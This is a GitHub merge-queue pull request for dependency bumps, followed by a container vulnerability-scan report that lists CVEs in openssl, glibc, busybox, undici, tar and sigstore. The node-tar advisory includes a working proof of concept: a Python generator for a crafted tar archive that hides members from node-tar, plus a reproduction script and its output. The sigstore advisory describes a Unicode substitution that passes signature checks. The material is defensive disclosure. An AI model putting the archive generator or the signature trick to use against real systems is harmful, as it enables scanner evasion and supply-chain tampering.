merge queue: checking main (f2f680c), #2396 and #2397 together #2399

Closed
mergify[bot] wants to merge 4 commits into main from mergify/merge-queue/35440bf950

Conversation

@mergify mergify Bot commented Jul 1, 2026

🎉 This pull request has been checked successfully and will be merged soon. 🎉

Branch main (f2f680c), #2396 and #2397 are queued together for merge.

This pull request has been created by Mergify to speculatively check the mergeability of #2397.
You don't need to do anything. Mergify will close this pull request automatically when it is complete.

Required conditions of queue rule Github Actions Updates for merge:

  • any of [🛡 GitHub repository ruleset rule main]:
    • check-neutral = @mergify/Mergify Merge Protections
    • check-skipped = @mergify/Mergify Merge Protections
    • check-success = @mergify/Mergify Merge Protections

Required conditions to stay in the queue:

---
checking_base_sha: 9433d0750738e1cee8e3f632b326a271a519c011
previous_check_retries: []
previous_failed_batches: []
pull_requests:
  - number: 2397
    scopes: []
scopes: []
...

semanticdiff-com Bot commented Jul 1, 2026


Review changes with SemanticDiff

Changed Files

File                              Status
.github/workflows/.docker.yaml    13% smaller
pyproject.toml                    Unsupported file format
uv.lock                           Unsupported file format

@mergify mergify Bot temporarily deployed to code_quality July 1, 2026 21:04 Inactive
sourcery-ai Bot commented Jul 1, 2026

Reviewer's Guide

Updates CI configuration and Python dependencies: bumps docker/build-push-action to v7.3.0 in the Docker GitHub Actions workflow and raises the mem0ai library minimum version to 2.0.11, with lockfile adjustments in uv.lock.

File-Level Changes

Change: Bump Docker GitHub Action used for linting and building images in CI to v7.3.0.
Details:
  • Update docker/build-push-action reference used for Dockerfile linting to the new SHA corresponding to v7.3.0.
  • Update docker/build-push-action reference used for building and pushing images to the new SHA corresponding to v7.3.0.
Files: .github/workflows/.docker.yaml

Change: Raise mem0ai Python dependency and sync lockfile.
Details:
  • Increase mem0ai minimum required version from 2.0.10 to 2.0.11 in the core dependency list.
  • Regenerate or update uv.lock to reflect the new mem0ai version and any transitive resolution changes.
Files: pyproject.toml, uv.lock

Possibly linked issues

  • #: PR updates mem0ai and docker/build-push-action exactly as requested in the Renovate Dependency Dashboard issue.


@socket-security


Review the following changes in direct dependencies. Learn more about Socket for GitHub.

Diff     Package                    Supply Chain Security   Vulnerability   Quality   Maintenance   License
Updated  mem0ai@2.0.10 ⏵ 2.0.11     99 (+1)                 100             100       100           100

View full report

@mergify mergify Bot temporarily deployed to docker_image July 1, 2026 21:06 Inactive
@mergify mergify Bot closed this Jul 1, 2026
@mergify mergify Bot deleted the mergify/merge-queue/35440bf950 branch July 1, 2026 21:07
@mergify mergify Bot temporarily deployed to container_health July 1, 2026 21:09 Inactive
MH0386 commented Jul 1, 2026


🔍 Vulnerabilities of ghcr.io/alphaspheredotai/chattr:0878199-pr-2399

📦 Image Reference ghcr.io/alphaspheredotai/chattr:0878199-pr-2399
digest: sha256:862fdfe6dc504d355cd82eef332c7149692ae38568b41100845f861a8c023213
vulnerabilities: critical: 15 high: 58 medium: 25 low: 10 unspecified: 11
platform: linux/amd64
size: 282 MB
packages: 430

critical: 1 high: 9 medium: 5 low: 2 libcrypto3 3.6.2-r2 (apk)

pkg:apk/wolfi/libcrypto3@3.6.2-r2?arch=x86_64&distro=wolfi

# Dockerfile (1:14)
FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS builder

ARG INSTALL_SOURCE
ARG PYTHON_VERSION

# skipcq: DOK-DL3018
RUN apk add --no-cache build-base git uv

USER nonroot

RUN --mount=type=cache,target=/root/.cache/uv \
    uv tool install ${INSTALL_SOURCE} --python ${PYTHON_VERSION}

FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS production

Severity   CVE               Affected range   Fixed version   EPSS score   EPSS percentile
critical   CVE-2026-34182    <3.6.3-r0        3.6.3-r0        0.237%       15th
high       CVE-2026-45447    <3.6.3-r0        3.6.3-r0        2.719%       84th
high       CVE-2026-7383     <3.6.3-r0        3.6.3-r0        0.358%       28th
high       CVE-2026-9076     <3.6.3-r0        3.6.3-r0        0.297%       21st
high       CVE-2026-45445    <3.6.3-r0        3.6.3-r0        0.320%       24th
high       CVE-2026-42765    <3.6.3-r0        3.6.3-r0        0.419%       34th
high       CVE-2026-42764    <3.6.3-r0        3.6.3-r0        0.684%       48th
high       CVE-2026-34183    <3.6.3-r0        3.6.3-r0        0.511%       40th
high       CVE-2026-34180    <3.6.3-r0        3.6.3-r0        0.513%       40th
high       CVE-2026-34181    <3.6.3-r0        3.6.3-r0        0.196%       9th
medium     CVE-2026-42767    <3.6.3-r0        3.6.3-r0        0.349%       27th
medium     CVE-2026-42766    <3.6.3-r0        3.6.3-r0        0.595%       44th
medium     CVE-2026-42769    <3.6.3-r0        3.6.3-r0        0.262%       17th
medium     CVE-2026-35188    <3.6.3-r0        3.6.3-r0        0.245%       16th
medium     CVE-2026-45446    <3.6.3-r0        3.6.3-r0        0.210%       11th
low        CVE-2026-42770    <3.6.3-r0        3.6.3-r0        0.259%       17th
low        CVE-2026-42768    <3.6.3-r0        3.6.3-r0        0.350%       27th

critical: 1 high: 9 medium: 5 low: 2 libssl3 3.6.2-r2 (apk)

pkg:apk/wolfi/libssl3@3.6.2-r2?arch=x86_64&distro=wolfi-20230201&upstream=openssl

# Dockerfile (1:14)
FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS builder

ARG INSTALL_SOURCE
ARG PYTHON_VERSION

# skipcq: DOK-DL3018
RUN apk add --no-cache build-base git uv

USER nonroot

RUN --mount=type=cache,target=/root/.cache/uv \
    uv tool install ${INSTALL_SOURCE} --python ${PYTHON_VERSION}

FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS production

Severity   CVE               Affected range   Fixed version   EPSS score   EPSS percentile
critical   CVE-2026-34182    <3.6.3-r0        3.6.3-r0        0.237%       15th
high       CVE-2026-45447    <3.6.3-r0        3.6.3-r0        2.719%       84th
high       CVE-2026-7383     <3.6.3-r0        3.6.3-r0        0.358%       28th
high       CVE-2026-9076     <3.6.3-r0        3.6.3-r0        0.297%       21st
high       CVE-2026-45445    <3.6.3-r0        3.6.3-r0        0.320%       24th
high       CVE-2026-42765    <3.6.3-r0        3.6.3-r0        0.419%       34th
high       CVE-2026-42764    <3.6.3-r0        3.6.3-r0        0.684%       48th
high       CVE-2026-34183    <3.6.3-r0        3.6.3-r0        0.511%       40th
high       CVE-2026-34180    <3.6.3-r0        3.6.3-r0        0.513%       40th
high       CVE-2026-34181    <3.6.3-r0        3.6.3-r0        0.196%       9th
medium     CVE-2026-42767    <3.6.3-r0        3.6.3-r0        0.349%       27th
medium     CVE-2026-42766    <3.6.3-r0        3.6.3-r0        0.595%       44th
medium     CVE-2026-42769    <3.6.3-r0        3.6.3-r0        0.262%       17th
medium     CVE-2026-35188    <3.6.3-r0        3.6.3-r0        0.245%       16th
medium     CVE-2026-45446    <3.6.3-r0        3.6.3-r0        0.210%       11th
low        CVE-2026-42770    <3.6.3-r0        3.6.3-r0        0.259%       17th
low        CVE-2026-42768    <3.6.3-r0        3.6.3-r0        0.350%       27th

critical: 1 high: 1 medium: 0 low: 0 glibc-locale-posix 2.43-r6 (apk)

pkg:apk/wolfi/glibc-locale-posix@2.43-r6?arch=x86_64&origin=glibc

# Dockerfile (1:14)
FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS builder

ARG INSTALL_SOURCE
ARG PYTHON_VERSION

# skipcq: DOK-DL3018
RUN apk add --no-cache build-base git uv

USER nonroot

RUN --mount=type=cache,target=/root/.cache/uv \
    uv tool install ${INSTALL_SOURCE} --python ${PYTHON_VERSION}

FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS production

Severity   CVE              Affected range   Fixed version   EPSS score   EPSS percentile
critical   CVE-2026-5450    <2.43-r7         2.43-r7         0.451%       36th
high       CVE-2026-5928    <2.43-r7         2.43-r7         0.345%       26th

critical: 1 high: 1 medium: 0 low: 0 ld-linux 2.43-r6 (apk)

pkg:apk/wolfi/ld-linux@2.43-r6?arch=x86_64&origin=glibc

# Dockerfile (1:14)
FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS builder

ARG INSTALL_SOURCE
ARG PYTHON_VERSION

# skipcq: DOK-DL3018
RUN apk add --no-cache build-base git uv

USER nonroot

RUN --mount=type=cache,target=/root/.cache/uv \
    uv tool install ${INSTALL_SOURCE} --python ${PYTHON_VERSION}

FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS production

Severity   CVE              Affected range   Fixed version   EPSS score   EPSS percentile
critical   CVE-2026-5450    <2.43-r7         2.43-r7         0.451%       36th
high       CVE-2026-5928    <2.43-r7         2.43-r7         0.345%       26th

critical: 1 high: 1 medium: 0 low: 0 libcrypt1 2.43-r6 (apk)

pkg:apk/wolfi/libcrypt1@2.43-r6?arch=x86_64&distro=wolfi-20230201&upstream=glibc

# Dockerfile (1:14)
FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS builder

ARG INSTALL_SOURCE
ARG PYTHON_VERSION

# skipcq: DOK-DL3018
RUN apk add --no-cache build-base git uv

USER nonroot

RUN --mount=type=cache,target=/root/.cache/uv \
    uv tool install ${INSTALL_SOURCE} --python ${PYTHON_VERSION}

FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS production

Severity   CVE              Affected range   Fixed version   EPSS score   EPSS percentile
critical   CVE-2026-5450    <2.43-r7         2.43-r7         0.451%       36th
high       CVE-2026-5928    <2.43-r7         2.43-r7         0.345%       26th

critical: 1 high: 1 medium: 0 low: 0 glibc 2.43-r6 (apk)

pkg:apk/wolfi/glibc@2.43-r6?arch=x86_64&distro=wolfi

# Dockerfile (1:14)
FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS builder

ARG INSTALL_SOURCE
ARG PYTHON_VERSION

# skipcq: DOK-DL3018
RUN apk add --no-cache build-base git uv

USER nonroot

RUN --mount=type=cache,target=/root/.cache/uv \
    uv tool install ${INSTALL_SOURCE} --python ${PYTHON_VERSION}

FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS production

Severity   CVE              Affected range   Fixed version   EPSS score   EPSS percentile
critical   CVE-2026-5450    <2.43-r7         2.43-r7         0.451%       36th
high       CVE-2026-5928    <2.43-r7         2.43-r7         0.345%       26th

critical: 0 high: 3 medium: 0 low: 0 busybox 1.37.0-r57 (apk)

pkg:apk/wolfi/busybox@1.37.0-r57?arch=x86_64&distro=wolfi-20230201

# Dockerfile (1:14)
FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS builder

ARG INSTALL_SOURCE
ARG PYTHON_VERSION

# skipcq: DOK-DL3018
RUN apk add --no-cache build-base git uv

USER nonroot

RUN --mount=type=cache,target=/root/.cache/uv \
    uv tool install ${INSTALL_SOURCE} --python ${PYTHON_VERSION}

FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS production

Severity   CVE               Affected range   Fixed version   EPSS score   EPSS percentile
high       CVE-2023-39810    <1.37.0-r58      1.37.0-r58      0.710%       49th
high       CVE-2026-26158    <1.37.0-r58      1.37.0-r58      0.160%       6th
high       CVE-2026-26157    <1.37.0-r58      1.37.0-r58      0.682%       48th

critical: 0 high: 3 medium: 0 low: 0 busybox 1.37.0-r57 (apk)

pkg:apk/wolfi/busybox@1.37.0-r57?arch=x86_64&distro=wolfi

# Dockerfile (1:14)
FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS builder

ARG INSTALL_SOURCE
ARG PYTHON_VERSION

# skipcq: DOK-DL3018
RUN apk add --no-cache build-base git uv

USER nonroot

RUN --mount=type=cache,target=/root/.cache/uv \
    uv tool install ${INSTALL_SOURCE} --python ${PYTHON_VERSION}

FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS production

high : CVE-2023-39810

Affected range: <1.37.0-r58
Fixed version: 1.37.0-r58
EPSS Score: 0.710%
EPSS Percentile: 49th percentile
Description

high : CVE-2026-26158

Affected range: <1.37.0-r58
Fixed version: 1.37.0-r58
EPSS Score: 0.160%
EPSS Percentile: 6th percentile
Description

high : CVE-2026-26157

Affected range: <1.37.0-r58
Fixed version: 1.37.0-r58
EPSS Score: 0.682%
EPSS Percentile: 48th percentile
Description
critical: 0 high: 3 medium: 0 low: 0 busybox 1.37.0-r57 (apk)

pkg:apk/wolfi/busybox@1.37.0-r57?arch=x86_64&origin=busybox

# Dockerfile (1:14)
FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS builder

ARG INSTALL_SOURCE
ARG PYTHON_VERSION

# skipcq: DOK-DL3018
RUN apk add --no-cache build-base git uv

USER nonroot

RUN --mount=type=cache,target=/root/.cache/uv \
    uv tool install ${INSTALL_SOURCE} --python ${PYTHON_VERSION}

FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS production

high : CVE-2023-39810

Affected range: <1.37.0-r58
Fixed version: 1.37.0-r58
EPSS Score: 0.710%
EPSS Percentile: 49th percentile
Description

high : CVE-2026-26158

Affected range: <1.37.0-r58
Fixed version: 1.37.0-r58
EPSS Score: 0.160%
EPSS Percentile: 6th percentile
Description

high : CVE-2026-26157

Affected range: <1.37.0-r58
Fixed version: 1.37.0-r58
EPSS Score: 0.682%
EPSS Percentile: 48th percentile
Description
critical: 0 high: 1 medium: 1 low: 2 undici 6.25.0 (npm)

pkg:npm/undici@6.25.0

# Dockerfile (28:28)
COPY --from=builder --chown=nonroot:nonroot --chmod=555 /home/nonroot/.local/ /home/nonroot/.local/

high 7.5: CVE-2026-12151 Uncontrolled Resource Consumption

Affected range: <6.27.0
Fixed version: 6.27.0
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score: 0.570%
EPSS Percentile: 43rd percentile
Description

Impact

The undici WebSocket client enforces maxPayloadSize on the cumulative byte count of fragments in a message but does not enforce a limit on the number of fragments. A malicious WebSocket server can stream many small or empty continuation frames that each pass per-frame and cumulative-size validation, collectively causing unbounded memory growth in the client process. The result is memory exhaustion and a denial of service.

Affected applications are those using the undici WebSocket client (new WebSocket(...)) or the WebSocketStream API that can be induced to connect to an attacker-controlled or compromised WebSocket endpoint.

All releases starting at undici 6.17.0 are affected.

Patches

Upgrade to undici v6.27.0, v7.28.0 or v8.5.0.

Workarounds

No workaround is available. The fix must be applied through an upgrade.

medium 5.9: CVE-2026-9679 Improper Neutralization of CRLF Sequences ('CRLF Injection')

Affected range: <6.27.0
Fixed version: 6.27.0
CVSS Score: 5.9
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N
EPSS Score: 0.257%
EPSS Percentile: 17th percentile
Description

Impact

undici's cookie parser in parseSetCookie percent-decodes cookie values via qsUnescape, turning encoded sequences like %0D%0A, %00, %3B, and %3D into their literal byte equivalents. RFC 6265 §5.4 does not specify any decoding and browsers do not decode either.

Applications that parse a Set-Cookie header and then forward the parsed value into a response header (proxies, middleware, SSR frameworks) become vulnerable to HTTP response header injection: an attacker-controlled upstream can inject arbitrary Set-Cookie, Location, or Cache-Control headers into the application's downstream response, enabling session fixation, open redirect, or cache poisoning.

Affected applications are those that use undici's cookie parsing (parseSetCookie, parseCookie, getSetCookies) and forward the parsed cookie value into a response header.

This was introduced in undici 7.0.0 via #3789.

Patches

Upgrade to undici v6.27.0, v7.28.0 or v8.5.0.

Workarounds

If upgrade is not immediately possible, do not forward values returned by parseSetCookie/parseCookie/getSetCookies directly into response headers; sanitize the value first to strip or reject CR, LF, NUL, ;, and = bytes.

low 3.7: CVE-2026-6733 Time-of-check Time-of-use (TOCTOU) Race Condition

Affected range: <6.27.0
Fixed version: 6.27.0
CVSS Score: 3.7
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
EPSS Score: 0.228%
EPSS Percentile: 13th percentile
Description

Impact

Undici's HTTP/1.1 client is vulnerable to response queue poisoning on reused keep-alive sockets. An attacker-controlled upstream server can inject an unsolicited HTTP/1.1 response onto an idle socket after a request completes. When the client dispatches the next request on that socket, it associates the injected response with the new request, causing responses to be delivered to the wrong requests.

This requires an attacker-controlled or compromised upstream HTTP/1.1 server and keep-alive connection reuse.

Patches

Upgrade to undici v6.27.0, v7.28.0 or v8.5.0.

Workarounds

Disable keep-alive connection reuse by setting keepAliveTimeout: 0 on the Client or Pool.

low 3.7: CVE-2026-11525 Permissive List of Allowed Inputs

Affected range: <6.27.0
Fixed version: 6.27.0
CVSS Score: 3.7
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
EPSS Score: 0.248%
EPSS Percentile: 16th percentile
Description

Impact

When undici parses a Set-Cookie header, it accepts any SameSite attribute value that contains Strict, Lax, or None as a substring, rather than the case-insensitive exact match specified by RFC 6265. Non-spec values are silently mapped to one of the three standard tokens:

  • SameSite=NoneOfYourBusiness is parsed as None, the most permissive setting.
  • SameSite=StrictLax is parsed as Lax, a downgrade from Strict.

Affected applications are those that consume Set-Cookie headers from server responses (for example via undici's fetch or proxy code paths) and then forward or rely on the parsed sameSite attribute. A malicious or non-compliant server can coerce the consumer's view of a cookie's SameSite policy to a weaker value, silently degrading the SameSite enforcement the cookie is supposed to provide.

This was introduced in undici 5.15.0 when the cookies feature was added.

Patches

Upgrade to undici v6.27.0, v7.28.0 or v8.5.0.

Workarounds

After parsing a Set-Cookie header, validate that the resulting sameSite attribute is one of 'Strict', 'Lax', or 'None' (exact, case-insensitive) before forwarding or relying on it.

critical: 0 high: 1 medium: 0 low: 0 pdfjs-dist 3.11.174 (npm)

pkg:npm/pdfjs-dist@3.11.174

# Dockerfile (28:28)
COPY --from=builder --chown=nonroot:nonroot --chmod=555 /home/nonroot/.local/ /home/nonroot/.local/

high 8.8: CVE-2024-4367 Improper Check for Unusual or Exceptional Conditions

Affected range: <=4.1.392
Fixed version: 4.2.67
CVSS Score: 8.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score: 72.648%
EPSS Percentile: 99th percentile
Description

Impact

If pdf.js is used to load a malicious PDF, and PDF.js is configured with isEvalSupported set to true (which is the default value), unrestricted attacker-controlled JavaScript will be executed in the context of the hosting domain.

Patches

The patch removes the use of eval:
mozilla/pdf.js#18015

Workarounds

Set the option isEvalSupported to false.

References

https://bugzilla.mozilla.org/show_bug.cgi?id=1893645

critical: 0 high: 0 medium: 1 low: 0 tar 7.5.13 (npm)

pkg:npm/tar@7.5.13

# Dockerfile (28:28)
COPY --from=builder --chown=nonroot:nonroot --chmod=555 /home/nonroot/.local/ /home/nonroot/.local/

medium 6.9: CVE-2026-53655 Interpretation Conflict

Affected range: <=7.5.15
Fixed version: 7.5.16
CVSS Score: 6.9
CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
EPSS Score: 0.107%
EPSS Percentile: 1st percentile
Description

Summary

tar (node-tar) applies a PAX extended header's size= record (and other PAX
overrides) to the next header entry of any type, including intermediary
metadata headers such as a GNU long-name (L) or long-link (K) entry. Per
POSIX pax, a PAX extended header (x) describes the next file entry, not the
intermediary extension headers that may sit between the x header and the file
it annotates. Because node-tar lets the PAX size override the byte length of
an intervening L/K/x header, an attacker can desynchronize node-tar's
stream cursor relative to every other mainstream tar implementation
(GNU tar, libarchive/bsdtar, Python tarfile, and the now-fixed tar-rs /
astral-tokio-tar).

The result is a tar parser interpretation differential (CWE-436): a single
crafted archive yields a different set of members under node-tar than under the
reference tar tools. An attacker can use this to hide a member from one parser
while it is visible to another, which defeats security tooling whose scanner and
extractor disagree on archive contents (e.g. a malware/secret scanner that lists
entries with one library while a downstream step extracts with another). node-tar
is one of the most widely deployed JavaScript tar libraries (it backs npm's own
package-tarball handling and is a transitive dependency of a very large fraction
of the npm ecosystem), so the blast radius for "files that extract differently
depending on the tool" is broad.

This is the same root cause and fix that was just addressed upstream in the Rust
tar ecosystem (tar-rs / astral-tokio-tar); node-tar carries the equivalent
defect and has no equivalent guard.

Impact

  • CWE-436 Interpretation Conflict / inconsistent tar parsing (the same class as
    the prior tar "smuggling" advisories GHSA-j5gw-2vrg-8fgx and
    GHSA-fp55-jw48-c537).
  • A crafted archive can present one logical member list to a tool that lists or
    scans with node-tar and a different member list to GNU tar / libarchive /
    Python tarfile (and vice versa). This lets a malicious file be hidden from a
    scanner that uses a different parser than the eventual extractor, or hidden
    from node-tar-based inspection while still landing on disk via a system tar.
  • No authentication is required; the only precondition is that a victim parses
    an attacker-supplied tar with node-tar. Tar archives are routinely fetched
    from untrusted sources (package registries, user uploads, CI artifacts,
    container layers).
  • Severity: Medium. Impact is integrity-of-archive-interpretation, not direct
    RCE; it is a building block for supply-chain / scanner-evasion attacks rather
    than a standalone code-execution primitive.

Vulnerable code (file:line)

src/header.ts (compiled to dist/esm/header.js:49 and
dist/commonjs/header.js:85 in the published tar@7.5.15):

// Header.decode(buf, off, ex, gex)
this.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12)

ex is the currently-accumulated PAX local extended header and gex the
PAX global header. The size override from ex/gex is applied
unconditionally to whatever header is being decoded next — there is no check
that the header being decoded is a real file entry rather than an intermediary
extension header.

src/parse.ts, [CONSUMEHEADER] constructs the next header with the current
EX/GEX applied:

const header = new Header(chunk, position, this[EX], this[GEX])

and later branches on whether that header is a metadata entry. this[EX] is
cleared only in the non-meta (real file) branch:

if (entry.meta) {
  // L / K / x / g metadata entries: this[EX] is left intact here
  if (entry.size > this.maxMetaEntrySize) {
    entry.ignore = true
    this[STATE] = 'ignore'
    entry.resume()
  } else if (entry.size > 0) {
    this[META] = ''
    entry.on('data', c => (this[META] += c))
    this[STATE] = 'meta'
  }
} else {
  this[EX] = undefined   // EX cleared only once a real file entry is reached
}

When the stream is ordered x (PAX, size=N) -> L (GNU long-name) -> file, the
L header is constructed with this[EX] still set, so its size/remain
becomes N instead of the L payload's true length. node-tar then consumes N
bytes of "metadata" and resumes header parsing at the wrong offset, landing
mid-stream. Every other mainstream parser applies the PAX size only to the
following file entry, so they stay synchronized.

The correct behavior (and the fix shipped upstream in the Rust tar ecosystem) is
to not apply PAX size/overrides when the entry being decoded is itself an
extension header (L GNU long-name, K GNU long-link, x PAX local, g PAX
global).

How input reaches the sink

tar.list(), tar.extract()/tar.x(), and tar.Parse/tar.Unpack all route
every 512-byte header block through Header.decode(...) with the
currently-accumulated EX/GEX. Any consumer that parses an attacker-supplied
archive (tar.list, tar.extract, or piping into the streaming Parser)
reaches the sink. No options need to be enabled; the default code path is
affected.

Proof of concept

Archive layout (all standard, GNU-tar-producible blocks):

block 0 : x  header  (PAX local extended, typeflag 'x'), its own size = len(pax body)
block 1 : x  payload : the single PAX record  "...size=2048\n"
block 2 : L  header  (GNU long-name '././@LongLink'), real size = 13
block 3 : L  payload : "longname.txt\0"      (the long name for the next file)
block 4 : file header 'file_a', size = 16
block 5 : file_a body (16 bytes, zero-padded to 512)
block 6 : file header 'file_b', size = 16
block 7 : file_b body (16 bytes, zero-padded to 512)

Generator (make_tar.py, pure stdlib, no external deps):

def hdr(name, size, typeflag):
    h = bytearray(512); name = name[:100]; h[0:len(name)] = name
    h[100:108] = b'0000644\0'; h[108:116] = b'0000000\0'; h[116:124] = b'0000000\0'
    h[124:136] = ('%011o\0' % size).encode(); h[136:148] = b'00000000000\0'
    h[156:157] = typeflag; h[257:263] = b'ustar\0'; h[263:265] = b'00'
    h[148:156] = b' ' * 8
    cs = sum(h); h[148:156] = ('%06o\0 ' % cs).encode()
    return bytes(h)

def pad(d):
    return d + b'\0' * ((512 - len(d) % 512) % 512)

def pax_record(key, val):              # length-prefixed PAX record "LEN key=val\n"
    body = b' %s=%s\n' % (key.encode(), str(val).encode()); n = len(body)
    while True:
        s = str(n).encode() + body
        if len(s) == n: break
        n = len(s)
    return s

pax = pax_record('size', 2048)         # malicious: claim size=2048 for the "next" entry
out  = hdr(b'PaxHeaders/x', len(pax), b'x') + pad(pax)
out += hdr(b'././@LongLink', 13, b'L') + pad(b'longname.txt\0')
out += hdr(b'file_a', 16, b'0')        + pad(b'AAAA_file_a_body')
out += hdr(b'file_b', 16, b'0')        + pad(b'BBBB_file_b_body')
out += b'\0' * 1024
open('pax-desync.tar', 'wb').write(out)

A negative-control archive is identical except the PAX record is
pax_record('comment', 'x') (no size=), written to pax-control.tar.

End-to-end reproduction (against pinned version tar@7.5.15, latest release)

Install the published package into a clean project and parse both archives:

$ npm init -y >/dev/null && npm install tar@7.5.15
$ node -e "console.log(require('tar/package.json').version)"
7.5.15
$ grep -n "ex?.size ?? gex?.size" node_modules/tar/dist/esm/header.js
49:        this.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12);

e2e.mjs:

import * as tar from 'tar'
async function listEntries(f){
  const got=[], warns=[]
  await tar.list({ file:f, onReadEntry:e=>{ got.push({path:e.path,size:e.size,type:e.type}); e.resume() },
                   onwarn:(code,_msg)=>warns.push(code) })
  return { got, warns }
}
const mal = await listEntries('pax-desync.tar')
console.log('MALICIOUS entries :', JSON.stringify(mal.got), 'warnings:', JSON.stringify(mal.warns))
const ctl = await listEntries('pax-control.tar')
console.log('CONTROL  entries :', JSON.stringify(ctl.got), 'warnings:', JSON.stringify(ctl.warns))

Verbatim output:

=== Deployed-consumer E2E: npm tar@7.5.15 (latest release) ===

[MALICIOUS] archive = x(PAX size=2048) -> L(GNU longname "longname.txt") -> file_a(16B) -> file_b(16B)
  tar.list() entries : []
  tar.list() warnings: ["TAR_ENTRY_INVALID"]

[NEGATIVE CONTROL] same archive, PAX record is "comment=x" (no size= override)
  tar.list() entries : [{"path":"longname.txt","size":16,"type":"File"},{"path":"file_b","size":16,"type":"File"}]
  tar.list() warnings: []

Reference parsers on the same pax-desync.tar:

$ tar tvf pax-desync.tar
-rw-r--r--  0 0      0        2048 Jan  1  1970 longname.txt          # GNU tar

$ bsdtar tvf pax-desync.tar
-rw-r--r--  0 0      0        2048 Jan  1  1970 longname.txt          # libarchive

$ python3 -c "import tarfile; print([m.name for m in tarfile.open('pax-desync.tar').getmembers()])"
['longname.txt']                                                      # Python tarfile

Interpretation differential: GNU tar, libarchive (bsdtar), and Python tarfile
all extract the member longname.txt from pax-desync.tar, whereas node-tar
7.5.15 desynchronizes, raises TAR_ENTRY_INVALID (checksum failure from
landing mid-stream), and reports zero members. The negative control proves
the divergence is caused solely by the PAX size= override being applied to the
intermediary L header — when the same archive carries a PAX record without
size=, node-tar parses it identically to the reference tools
(longname.txt, file_b).

Suggested fix

When decoding a header, do not apply PAX size (or other PAX overrides) if the
header being decoded is itself an extension header. Concretely, in
src/parse.ts clear/ignore this[EX] (and this[GEX] for size) when the
header's type is ExtendedHeader, GlobalExtendedHeader, NextFileHasLongPath
(GNU L), or NextFileHasLongLinkpath (GNU K); equivalently, in
Header.decode, gate the ex?.size ?? gex?.size override on the decoded type
not being one of those extension types. This mirrors the upstream Rust fix,
which guards pax_size with
is_gnu_longname || is_gnu_longlink || is_pax_local_extensions || is_pax_global_extensions.

A fix PR is being prepared against a private fork and will be linked here.

Fix PR

To be linked from a private fork of the repository (the fix will not be pushed
to any public fork or to upstream during embargo).

Credits

Reported by tonghuaroot.

critical: 0 high: 0 medium: 1 low: 0 @sigstore/core 3.2.0 (npm)

pkg:npm/%40sigstore/core@3.2.0

# Dockerfile (28:28)
COPY --from=builder --chown=nonroot:nonroot --chmod=555 /home/nonroot/.local/ /home/nonroot/.local/

medium 5.4: CVE-2026-48758 Improper Verification of Cryptographic Signature

Affected range: <=3.2.0
Fixed version: 3.2.1
CVSS Score: 5.4
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
Description

Impact

The preAuthEncoding function in @sigstore/core uses Node.js 'ascii' encoding when converting the PAE (Pre-Authentication Encoding) string to bytes. This allows payloadType to be mutated after signing without invalidating the signature, breaking the type-binding guarantee that DSSE is designed to provide.

In packages/core/src/dsse.ts, the PAE function builds a string containing payloadType and then encodes it with Buffer.from(prefix, 'ascii').

In Node.js, 'ascii' encoding for string-to-Buffer is equivalent to 'latin1', which truncates characters above U+00FF to their low byte. This means for any ASCII character, there exist Unicode characters (at U+01xx, U+02xx, etc.) that produce the identical encoded byte:

Original  Codepoint  Mutant  Codepoint  Encoded byte
t         U+0074     Ŵ       U+0174     0x74
e         U+0065     ť       U+0165     0x65

An attacker can substitute every character in payloadType with a Unicode variant whose low byte matches, producing identical PAE bytes and a passing signature verification.

